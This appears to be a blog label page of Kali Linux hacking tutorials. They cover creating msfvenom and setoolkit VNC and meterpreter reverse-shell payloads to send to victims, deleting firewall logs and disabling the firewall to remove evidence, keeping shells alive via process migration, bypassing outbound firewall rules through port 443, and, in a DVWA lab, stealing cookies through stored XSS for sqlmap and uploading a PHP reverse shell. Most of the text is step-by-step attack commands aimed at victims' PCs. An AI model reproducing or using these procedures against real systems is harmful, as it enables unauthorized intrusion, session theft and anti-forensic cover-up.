Showing posts with label Kali Linux. Show all posts
Showing posts with label Kali Linux. Show all posts

Capture VNC Session of Remote PC using Settoolkit

Today in this article we are going to compromise the target through VNC payload attack. It is a very simple method for beginners.
In this tutorial, we will learn how to create a VNC payload using Social Engineering Toolkit. We will try to achieve VNC shell of victim’s PC.
Let’s Start!!!
Open a terminal in Kali Linux, and type “setoolkit” on it to start the Social Engineering Toolkit Framework.
Select the first option to choose from the list of Social-Engineering Attacks.
Press '1'
To proceed further we will choose "Create a Payload and Listener" option.
Press '4'
This will show an arsenal of different payloads. As in this article our focus is VNC, hence we will select the VNC payload.
Press '3'
Next Step requires an IP address on which the payload listener is to be started. In our case it is's IP) and after that it will ask for the port for reverse listener. In our case it will be 4444
After setting up this, it starts generating VNC payload and save it under highlighted path. Explore /root/.set/payload.exe. Send the payload.exe file to the target.
Further it will ask to start payload listener Type "yes" and hit "Enter" this will start loading the Metasploit Framework.
After loading the Metasploit Framework, it runs the multi handler automatically; Now once the victim clicks on the payload file sent by the attacker, attacker will get a VNC shell.
Our VNC attack using set toolkit is successful and we received the victim's VNC

shell on our system.

How to Delete Firewall Log in Remote PC using Metasploit

This article is only for tutorial purpose where we are trying to share our experience to enhance skills of IT researchers. This article will help attackers to protect themselves if they were caught by firewall. Usually when an attacker establish the connection with target’s system a log is generated having some details like time, ports, IP address and MAC address of attacker. So if you are not aware of such things then you might leave an evidence of your attacks in victim’s system. To prevent yourself you must go through this article where you will learn how to read the firewall logs as well as how to delete the logs from victim’s PC.

Being an intelligent attack once you have hacked the target then after fetching important data the most essential thing is to read and delete the log files from the target system.
First hack The Victim PC read Here

So now we are inside windows/system32 where we can perform admin level task. Type following command inside CMD shell to move inside the logs directory

cd logfiles/firewall
Type dir to observe the present directory of firewall.

From screenshot you can find that there are two files and two directories, therefore being an attacker I need to check the log firewall from target PC. Now Type following command to read firewall logs.
type pfirewall.log

So the highlighted log is showing MAC address of attacker system. Hence to protect yourself always delete these logs.
To delete pfirewall.log we must turn off firewall, type following command to disable firewall from victim PC.
Netsh firewall set opmode mode= DISABLE

Now type given below command to delete pfirewall.log
Del pfirewall.log

Now type given below command to verify pfirewall.log is still available or not in victim’s PC
type pfirewall.log

Run OS Command in Multiple Session in Metasploit

Again we are sharing our experience with our visitors to enhance their skills and ability. In this article you will learn how to manage multiple sessions of different targets in a network. Once you hacked more than one system in a network and received multiple meterepreter session in your Kali Linux then how will you retrieve data simultaneously from all targets.

First an attacker needs to create a payload and share it in the network with his targets, then start multi handler in metasploit framework. Now when the available targets will open the payload in their system, the attacker will receive the series of sessions.

Here you can see from given screenshot I have receive two sessions from different system.

msf exploit(handler) > sessions

In order to gather the information from both targeted system simultaneously I had used post exploitation which let an attack to execute same command for multiple sessions at a time.

This module executes an arbitrary command line
msf exploit(handler) > use post/multi/general/execute
msf post(execute) > set command ipconfig
msf post(execute) > set session 1
msf post(execute) >exploit

In given screenshot you can see I have executed ipconfig to know the network configuration for session 1 and here the target IP is as result.

Then in next step I just need to change session from 1 into 2 so that I can know network configuration for session 2 also and here the target IP is as result.

msf post(execute) > set session  2
msf post(execute) >exploit

Hiding Shell with Prepend Migrate using Msfvenom

If you are a network penetration tester then you must read this article to enhance your skill. It is the part of advance penetration testing which might help in creating a strong payload for an attack to the targeted system. In this article your will learn more about the strength of msfvenom, here we will create such a payload which is different from my previous tutorial. The payload migrate its process if current process gets killed hence attacker will not lose his session if victim kills the current process ID of the payload from its system.

Open the terminal in kali Linux and type following command to generate exe payload.
Msfvenom –p windows/meterpreter/reverse_tcp lhost= lport=5555 prependmigrate=true prepenmigrateprocess=explorer.exe –f exe > /root/Desktop/raj.exe
Above command will create the raj.exe file on the Desktop now send this file to remote system for attack

Load metasploit framework and type following command to start the attack.
use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost
msf exploit(handler) > set lport 5555
msf exploit(handler) > exploit

When victim will open raj.exe file we will get meterpreter session.

meterpreter> sysinfo

Now let check the process ID of our payload.
meterpreter> ps
From the highlighted text you can read the process ID shown for raj.exe i.e. 4960.

Now attacker tries himself to kill the current process state for raj.exe to verify process migration, as result process 4960 get killed.
meterpreter> kill 4960

But!!!  Still we have victim’s session which means raj.exe file migrate into new process ID.
meterpreter> sysinfo

Shell to Meterpreter using Session Command

In previous article we have seen how to upgrade a command shell into meterpreter using Post exploitation in metasploit. Again we are going to perform same task using a different technique.

msf auxiliary(telnet_login) >sessions

In following screenshot you can perceive that it is showing the TYPE for session 1: shell.

Once you got the reverse connection of remote system and access its command shell through metasploit now you can manipulate your active sessions.  You just need to type sessions –h as command inside metasploit, this help command will display the multiple option which can be utilized with active session.
msf auxiliary(telnet_login) >sessions –h

So in the following screenshot you can perceive that the highlighted option is used to upgrade a command shell into meterpreter session.

Since we have command shell so here we can use “-u” (option) with session ID for upgrading our shell into meterpreter session. Execute following command for session manipulation.
msf auxiliary(telnet_login) >sessions –u 1

When you will execute above command you will get meterpreter session as session 2. Now enjoy your meterpreter session and execute its command.
msf auxiliary(telnet_login) >sessions

Capture VNC Session of Remote PC using Msfvenom

Today in this article we’ll try to compromise the target using VNCpayload. In this tutorial you’ll learn how to create a VNC payload using msfvenom and try to achieve VNC shell of victim’s PC.
Open the terminal in your Kali Linux and type following command to generate a VNC payload using msfvenom command.

Msfvenom –p windows/vncinject/reverse_tcp lhost= lport=4444 –f exe > /root/Desktop/vnc.exe

Now the above command will generate an exe file for the VNC payload on the desktop of Kali Linux. Being an attack you need to send this backdoor to the target and start multi handler in the metasploit framework.

use multi/handler
msf exploit(handler) > set payload windows/vncinject/reverse_tcp
msf exploit(handler) > set lhost
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit

Now attacker tries to connect with target using VNC payload, from given screenshot you can see it has launched vncviewer and we have our session 1 is running at background.

How to Upgrade Shell to Meterpreter

In network penetration testing, we always wish to hack a system of an internal network and try to make unauthorized access through a meterpreter session using the Metasploit framework.  But there are some exploits which will directly provide victim’s command shell instead of meterpreter session. In this article, we have tried to upgrade from the victim’s shell to a meterpreter shell.
Now once we have access to victims command shell then follow the steps given below to upgrade a command shell into the meterpreter shell.
Here I already have access to command shell of victim’s PC

So now we can use “-u” (option) with the session ID for upgrading our shell into meterpreter session. Execute the following command for session manipulation.

Other Way
This module attempts to upgrade a command shell to meterpreter. The shell platform is automatically detected and the best version of meterpreter for the target is selected.
use post/multi/manage/shell_to_meterpreter
msf post(shell_to_meterpreter) > set session 1
msf post(shell_to_meterpreter) > exploit

How to set and Bypass Outbound Rule in Windows Firewall using Metasploit

In previous the firewall penetration testing article you might have read how firewall is used for blocking any particular port in a network to prevent hackers or malicious software from gaining access to your PC. This article is written to describe that how an attacker can bypass firewall rules and try to make unauthorized access of victim’s PC.

Target: windows PC
Attacker: Kali Linux

Lets start!!!

Open window firewall control panel and select Advance setting to configure firewall rules as shown in screenshot.

Go to outbound rules to configure new rule for firewall to add security layer in network to secure it form attackers.

Select the type of firewall rule to be created click radio button for option Port that controls connections for a TCP and UDP port then click on next.

Now specify the protocol and port to which rule is applies therefore I choose TCP and then specify port 4444 on which this rule will applies and then click on next.

 Select radio button for block the connection when connection matches to the condition specified condition.

Select all check boxes when this rule applies.

Here give the name to your own specified rule.  You can see in the screenshot I had named it block port 4444 and then click on finished.

Here you can see the new outbound rule is added into the list of outbound rules. Hence victim has defense himself from establishing connection with port 4444, now if attacker try to connect with victim through port 4444 then it might be possible that attacker doesn’t receive any reverse connection.

Now let’s examine when an attacker tries to send malicious file using port 4444, will it work or not. Does attacker able to receive reverse connection of victim’s pc?

Here I have generated a malicious file using msfvenom in the format of .exe file and then send this 4444.exe file to victim and start multi handler at background.

msfvenom -p windows/meterpreter/reverse_tcp lhost= lport=4444 -f exe > /root/Desktop/4444.exe

Now let’s find whether we will succeed or get failed to achieve reverse connection of victims PC.

use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit

OOPS!!!  No response
It means we get failed in establishing connection between victim and attacker. Now as we know victim has protected himself from connecting with port 4444.

Now whenever you face such type of restriction for establishing connection with victim then do not get disappoint think twice what is the aim of an attack? He only wants to trap victim and want to establish a connection.

Now send your malicious file on those ports which always left open for incoming and outgoing connection.  For example port 80, port 443, port 445 and etc.

When again an attacker tries to send malicious file using port 443. Does attacker able to receive reverse connection of victim’s pc?

msfvenom -p windows/meterpreter/reverse_https lhost= lport=443 -f exe > /root/Desktop/443.exe

 Start multi handler and send 443.exe to victim.

use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_http
msf exploit(handler) > set lhost
msf exploit(handler) > set lport 443
msf exploit(handler) > exploit

GREAT!!!  Attack is successful
We successfully got meterpreter session of victim’s PC inside the metasploit framework.

Stored XSS Exploitation in DVWA (Beginner Guide)

This article is written to bring awareness among all security researchers and developers so that they may be able to learn the level of damage cause by XSS attack if the web server is suffering from cross site scripting vulnerability.

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. 

Stored XSS (Persistent or Type I)
Stored XSS generally occurs when user input is stored on the target server, such as in a database, in a message forum, visitor log, comment field, etc. And then a victim is able to retrieve the stored data from the web application without that data being made safe to render in the browser. With the advent of HTML5, and other browser technologies, we can envision the attack payload being permanently stored in the victim’s browser, such as an HTML5 database, and never being sent to the server at all.
Lets start!!!
Attacker: Kali Linux
Target: DVWA

For this tutorial I had targeted DVWA and explore localhost IP in browser; now login with admin: password and select the stored cross site scripting vulnerbility from given list of vulnerbility.

Now have a look over a small script which would generate an alert window. So in the text area given for message I will inject the script which get store in the server.

Now when user will visit this page to read our message his browser will execute our script which generates an alert prompt as showing following screenshot.

This was a small demo to show how to inject any script if server is suffering from XSS and further you will learn what else an attacker can do to cause damage inside a web application server.

If attack is aware that the web server is having XSS then he might think to steal the web cookies which contain session Id therefore he will generate a script to fetch running cookies.
In following screenshot you can see I have injected the script to get web page cookies.

Here in given below image when I have executed the script I have successfully fetched the browser cookies and now further I will use this cookies for retrieving the data of web application server. 


It might be possible that the web application server has more than one vulnerabilities, let assume if it is also having SQL injection vulnerability then it become very easy for attacker to retrieve the data from its database using stolen cookies.

For example in DVWA I switch from XSS to SQL injection; now copy its URL with user ID=1.

From above we have browser cookie and target URL for making SQL injection attack. Now open the terminal in your kali Linux and use above cookie and URL inside the command of sqlmap as shown in screenshot
Sqlmap – u “” –cookie=“security=low; PHPSESSID=r12pk67cuq3s7eo4iktb88sud2” –dbs --batch

Hence you can see it has fetched all present database names inside database system.

Gaining Shell Access with XSS
Now let assume if server is suffering from XSS as well as file uploading both vulnerabilities; in this case how an attacker would be able to cause harm to the web application server.

Firstly let’s prepare our malicious PHP file for uploading in web server. As we always use msfvenom for this purpose and then save the generated PHP codes in a text file as shell.php

Msfvenom –p php/meterpreter/reverse_tcp lhost= lport=4444 –f raw

Again I switched to file uploading vulnerability in DVWA to upload shell.php and from screenshot you can see our shell.php file is successfully uploaded now copy the highlighted path.

Start multi handler inside the metasploit framework.

Here the text area given for message length is not sufficient to inject our next script therefore make right click on window and select inspect element to view it’s given message length for text area.

Here you can see message length for text area is decided as “50”.

Change message length from “50 to 500” so that it becomes easy to inject our next script.

Now in following screenshot you can see I have injected the path of uploaded file in script which will get saved in the server. When user click on it to read the message he will execute our shell.php file which provide reverse connection on attacker machine.

Here you can see as soon as script will execute it has shown meterpreter session for victim’s PC.